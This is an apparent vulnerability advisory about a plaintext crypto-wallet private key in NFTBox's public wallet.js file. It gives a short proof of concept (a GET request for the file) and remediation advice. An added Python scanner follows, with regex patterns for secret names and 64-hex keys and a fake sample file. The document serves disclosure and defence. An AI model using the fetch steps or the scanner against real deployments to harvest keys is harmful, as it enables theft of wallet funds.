# Exploit Title: NFTBox - NFT Marketplace Solution - Hardcoded Private Key Disclosure
# Date: 2026-01-21
# Exploit Author: Sohel Yousef -- https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://bdtask.com/
# Software Link: https://codecanyon.net/item/nftbox-nft-marketplace-solution/35043063
# Version: Latest
# Tested on: Linux/Windows
# CVE: N/A

Description:
A critical Information Disclosure vulnerability exists in the 'NFTBox' script. The application ships a crypto wallet private key inside a publicly served JavaScript file (`wallet.js`). Anyone who can fetch the asset can recover the key and sign transactions as that wallet, which lets them drain its funds or call smart contracts in the wallet's name without any authorization. No authentication is required, since the file is a static asset.

Vulnerable File:
/public/assets/website/js/wallet.js

Proof of Concept (PoC):
1. Navigate to the following path on the target application:
https://[TARGET-DOMAIN]/public/assets/website/js/wallet.js
2. Search for variable declarations related to wallet configuration (e.g., 'privateKey', 'secret').
3. The private key is visible in plain text.

Sample Request:
GET /public/assets/website/js/wallet.js HTTP/1.1
Host: [TARGET-DOMAIN]

Response (Snippet):
...
var privateKey = "0x123456..."; // SENSITIVE DATA EXPOSED
...

Impact:
Full compromise of the associated wallet, loss of funds, and unauthorized smart contract manipulation. Any key found this way must be treated as already compromised: remove it from client-side assets, move transaction signing to a server-side component, and rotate the wallet.
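The manual steps above (fetch wallet.js, look for secret-like variable names, confirm a plaintext key) can be automated so that every static JavaScript asset of a deployment is checked the same way. The following scanner is an added example and is not part of the advisory or of the NFTBox code base; it assumes nothing about the real wallet.js beyond what the advisory shows (a `privateKey` variable assigned a hex string literal). The sample JavaScript embedded below is constructed for the demonstration, the key and transaction hash in it are fake, and the function names (`scan_js_for_keys`, `fetch_and_scan`) are this example's own. It flags two things: string assignments to secret-like identifiers (high confidence when the value is 64 hex digits, the length of a secp256k1 private key) and bare 64-hex literals on other lines (low confidence, because a transaction hash has the same length and must be triaged by hand).

```python
"""Scan a JavaScript asset for hard-coded wallet secrets.

Added example, not code from the advisory or the vendor. Offline by default:
it scans the constructed SAMPLE_WALLET_JS; pass a URL to scan a live asset
on a target you are authorized to test.
"""
import re
import sys
import urllib.request

# Identifiers whose string value is almost certainly a secret.
SECRET_NAME_RE = re.compile(r"(?i)(private_?key|secret|mnemonic|seed_?phrase)")

# `var|let|const name = "value"` or `name: "value"` (object literal), either quote style.
ASSIGN_RE = re.compile(r"(?:\b(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*[:=]\s*(['\"])(.*?)\2")

# A secp256k1 private key is 32 bytes = 64 hex digits, usually 0x-prefixed.
# A transaction hash has the same length, so a bare hit still needs triage.
HEX_KEY_RE = re.compile(r"\b(?:0x)?[0-9a-fA-F]{64}\b")

# Constructed sample resembling the pattern in the advisory; NOT the vendor's file.
SAMPLE_WALLET_JS = """\
// constructed sample for the scanner demo
var rpcUrl = "https://rpc.example.invalid";
var contractAddress = "0x000000000000000000000000000000000000dEaD";
var privateKey = "0x0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"; // fake key
var lastTx = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef";
const config = { apiSecret: 'not-a-key-but-still-a-secret' };
"""


def redact(value: str) -> str:
    """Keep enough of a value to confirm the finding without copying the secret around."""
    if len(value) <= 10:
        return "*" * len(value)
    return f"{value[:6]}...{value[-4:]}"


def scan_js_for_keys(source: str) -> list:
    """Return one finding (dict) per suspicious line of JavaScript source, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        named_hit = False
        for m in ASSIGN_RE.finditer(line):
            name, _quote, value = m.groups()
            if SECRET_NAME_RE.search(name):
                named_hit = True
                findings.append({
                    "line": lineno,
                    "kind": "named_secret",
                    "identifier": name,
                    "value": redact(value),
                    # 64 hex digits under a secret-like name: almost certainly a private key.
                    "confidence": "high" if HEX_KEY_RE.fullmatch(value) else "medium",
                })
        # Bare 64-hex literal under a non-secret name: could be a key or a tx hash.
        if not named_hit:
            hex_match = HEX_KEY_RE.search(line)
            if hex_match:
                findings.append({
                    "line": lineno,
                    "kind": "bare_hex_64",
                    "identifier": None,
                    "value": redact(hex_match.group(0)),
                    "confidence": "low",
                })
    return findings


def fetch_and_scan(url: str, timeout: float = 10.0) -> list:
    """Fetch a JavaScript asset over HTTP(S) and scan it (live-target use only)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return scan_js_for_keys(body)


if __name__ == "__main__":
    # e.g. python scan_wallet_js.py https://TARGET/public/assets/website/js/wallet.js
    target_url = sys.argv[1] if len(sys.argv) > 1 else None
    results = fetch_and_scan(target_url) if target_url else scan_js_for_keys(SAMPLE_WALLET_JS)
    for finding in results:
        print(finding)
```

On the constructed sample the scanner reports the `privateKey` line as a high-confidence named secret, the `lastTx` line as a low-confidence bare 64-hex literal (a transaction hash, i.e. the false-positive case a reviewer discards), and the `apiSecret` entry as a medium-confidence named secret; the 40-hex contract address is ignored. Findings are redacted on purpose so that a scan report does not itself become a second copy of the key.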